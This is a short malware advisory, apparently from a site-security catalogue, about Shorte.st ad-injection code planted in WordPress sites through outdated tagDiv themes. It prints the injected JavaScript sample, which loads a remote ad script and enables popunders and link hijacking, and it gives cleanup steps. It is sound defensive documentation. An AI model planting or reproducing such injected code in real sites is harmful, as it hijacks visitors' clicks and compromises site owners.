Description:
Injected unwanted Shorte.st ads, that hijack link click. The Shorte.st script is injected via a vulnerability in outdated tagDiv themes: Nespapere and Newsmag (and their derivatives).
Malware sample:
//<![CDATA[
(function() {
var configuration = {
"token": "8f1bc5aa7e697f9829c057cfd305bd64",
"exitScript": {
"enabled": true
},
"popUnder": {
"enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte[.]st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//]]>
Affecting: WordPress sites with outdated tagDiv themes such as Newspapaper and Newsmag.
Cleanup: Remove the injected code from the Ads/Header Ad section of the theme settings in WordPress admin interface. Update the theme or switch to a more secure theme.
More Information: Unwanted “Shorte St” Ads in Unpatched Newspaper Theme
How to clean a hacked WordPress site